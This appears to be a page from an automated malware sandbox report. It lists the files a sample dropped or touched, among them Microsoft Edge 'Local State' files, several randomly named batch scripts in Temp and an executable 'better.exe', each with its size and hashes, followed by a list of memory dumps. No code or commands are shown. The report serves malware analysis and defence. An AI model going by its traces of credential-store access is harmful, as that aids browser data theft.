C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
93e8e92da560f2bc32c856c5da3ca549

SHA1
fef848aa5e189f846f4da6ebdeddc9c2b88294cb

SHA256
9f03215176966f30d8d0f9f37fda9c7bfac67a44e7a719faff485232305459dc

SHA512
99b10609f4c2a9277564b8e4d05ae63f5ece96570416b8414a1635482f05756c68ceeea0c83f83b79eb33d33607e561b5c8c4860feba3bd421aa1b5e7cfd4585

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
c345c175747b9fec788b247e681a53ac

SHA1
53ee63e1e2f47feaf2e70362ba7de0bf27dc62d2

SHA256
428a358cac56e9d42d5db80b50b54f1472de63fcf5002c325c287b08499c3c76

SHA512
cc73d898bbddbf6f27a30428472bfa58afdf0b368b8282977077f06ffd4dcd7d91ff5a4f95b72dc62b20449044f1366b54b9d09ae952716a7551cc82b80dc2e5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
d0817258243fb291e4d6dbd5fc38830b

SHA1
323ddf933ef15a7dd8d63be385d2f9cfca69e924

SHA256
76f144e1159a0e16b4bbf2ea56f83c6f91de520ffdff348f7c63bd2f6dea709e

SHA512
942a7559d2503c1eb4a03697cbef5d45bfc7204a3ee34cfec0d4633b3d6f765fbd105c3cc1d2bb977f25c5eb70bd9b045bdadea587c17ed7b10c5108689309a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\2hXNisjBIHgX.bat

Filesize
196B

MD5
354cfa7389238b83d14aff089e80b713

SHA1
9a4090e1264130389172da414c9f0341fbd72925

SHA256
5bee842cae311bd2132e51b7402ca67356ef37e4f2a608618e17cc00976bbff7

SHA512
b282de76d97ab163616c3705d2bdcb8d435e5c24436214c950f96d3f5aac31f7ccbee43f4e8029e3b405a992eaaea71857248daaa8729f23865508d103d870cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\FKQeXFQEbIVw.bat

Filesize
196B

MD5
6355e39bc9e43d9e44d6b732024712ef

SHA1
82ff3a7bc7ca0708c378117f67128c5fed6e5801

SHA256
e37a4e334b6f46e67cd58328b7d882567956f98df015becfecc9465ffe16a864

SHA512
8e24bce147a9bab3872d65a24a7d71d3780c413f68d832eaad273a74632d9bff273aa4eaf2eb640dd3c2a53f249ce71c9d43c41b34019bc67366c53192816ea5

Download Submit
C:\Users\Admin\AppData\Local\Temp\G8yED2hlIqcF.bat

Filesize
196B

MD5
1c39aaadfea8e73fbf7157ec9399a73c

SHA1
c70d5cb5736176563b2b94935bf136fa1e0c2e7f

SHA256
79fc40697d571f729dd978e48a87ac6c3194663dcb65f87890eda81df3df06b4

SHA512
daf5bc9d7365a89957c0ff6ef3e98f0448b7203b9ecbf7987373a746df1202e12f4dc3fcade167861d80f202be8a592c21f36996420a2442eeb1159cfd4bb9fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\better.exe

Filesize
3.1MB

MD5
47ec64e3d129b23c44f417cbc2a07aa7

SHA1
e65fbcf69e6e808ebe7bc9b13e483c5fc80d5fa2

SHA256
ccb17adb4b57a95a61acb010c01da98dc150be67a85df2ab40ba9d1f078f8373

SHA512
52247a235b708e98efcf977fd109344e16df9c5a9f13ad5afd395df3f009d9ee6edf81fef9d74a31a9fdec1f851e61642912eb9bc8384b39042b70f9d8b7d510

Download Submit
C:\Users\Admin\AppData\Local\Temp\NuaCX4Q0O48V.bat

Filesize
196B

MD5
9af9ad72e83c1b45edd271ceaba195fe

SHA1
6f1367a5c7b4819e450c5186d3b80f470651edbb

SHA256
9295f188521b68e5386edc14db186a885ea30881e06c87f90d1969b7cc48518b

SHA512
929fa0e5cfa0be67d46148003eec76f44cfa0c5a262320b9a53111ec35cb650d1ac51c4d35b8b56f438627af02ea3aa4df97c4b6653e71fc7e6591cd4eb3c879

Download Submit
C:\Users\Admin\AppData\Local\Temp\yUMrOqyxF40c.bat

Filesize
196B

MD5
1445f901d5a34ec351088beafe89bf9d

SHA1
76e1f85c9f81ce3d6728da0effef818846e2c1f5

SHA256
67d5674e501d7d8823dfcfab382ed4669c5428be49f9877920e4c57277f56056

SHA512
6ce3374e3fb927f4f44796eb3c153d85e69ca6949dade89628dd26204c367621a29d7c32ba9be75ae71e764ead7847eeea62520d245a562ed4f2a8f04abde79f

Download Submit
memory/1768-139-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/1768-173-0x0000000006E40000-0x0000000006E52000-memory.dmp

Filesize
72KB

Download
memory/1768-198-0x0000000009E20000-0x0000000009E48000-memory.dmp

Filesize
160KB

Download
memory/1768-201-0x0000000009E20000-0x0000000009E48000-memory.dmp

Filesize
160KB

Download
memory/1768-193-0x0000000009DC0000-0x0000000009DE3000-memory.dmp

Filesize
140KB

Download
memory/1768-131-0x0000000007350000-0x0000000007CD5000-memory.dmp

Filesize
9.5MB

Download
memory/1768-134-0x0000000007350000-0x0000000007CD5000-memory.dmp

Filesize
9.5MB

Download
memory/1768-136-0x0000000008F40000-0x0000000009B28000-memory.dmp

Filesize
11.9MB

Download
memory/1768-146-0x0000000006DF0000-0x0000000006DF6000-memory.dmp

Filesize
24KB

Download
memory/1768-149-0x0000000006DF0000-0x0000000006DF6000-memory.dmp

Filesize
24KB

Download
memory/1768-150-0x0000000006DE0000-0x0000000006DEC000-memory.dmp

Filesize
48KB

Download
memory/1768-157-0x0000000006EC0000-0x0000000006F74000-memory.dmp

Filesize
720KB

Download
memory/1768-158-0x0000000006E80000-0x0000000006EBA000-memory.dmp

Filesize
232KB

Download
memory/1768-161-0x0000000006E80000-0x0000000006EBA000-memory.dmp

Filesize
232KB

Download
memory/1768-162-0x0000000006E60000-0x0000000006E7F000-memory.dmp

Filesize
124KB

Download
memory/1768-165-0x0000000006E60000-0x0000000006E7F000-memory.dmp

Filesize
124KB

Download
memory/1768-166-0x0000000006F80000-0x0000000006F95000-memory.dmp

Filesize
84KB

Download
memory/1768-169-0x0000000006F80000-0x0000000006F95000-memory.dmp

Filesize
84KB

Download
memory/1768-170-0x0000000006E40000-0x0000000006E52000-memory.dmp

Filesize
72KB

Download
memory/1768-196-0x0000000009DC0000-0x0000000009DE3000-memory.dmp

Filesize
140KB

Download
memory/1768-153-0x0000000006DE0000-0x0000000006DEC000-memory.dmp

Filesize
48KB

Download
memory/1768-154-0x0000000006EC0000-0x0000000006F74000-memory.dmp

Filesize
720KB

Download
memory/1768-138-0x0000000008F40000-0x0000000009B28000-memory.dmp

Filesize
11.9MB

Download
memory/1768-142-0x0000000006C40000-0x0000000006C51000-memory.dmp

Filesize
68KB

Download
memory/1768-145-0x0000000006C40000-0x0000000006C51000-memory.dmp

Filesize
68KB

Download
memory/5556-205-0x0000000000C30000-0x0000000000F54000-memory.dmp

Filesize
3.1MB

Download
memory/5652-214-0x000000001C420000-0x000000001C4D2000-memory.dmp

Filesize
712KB

Download
memory/5652-213-0x000000001C310000-0x000000001C360000-memory.dmp

Filesize
320KB

Download

Analysis

Sharing

Errors

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads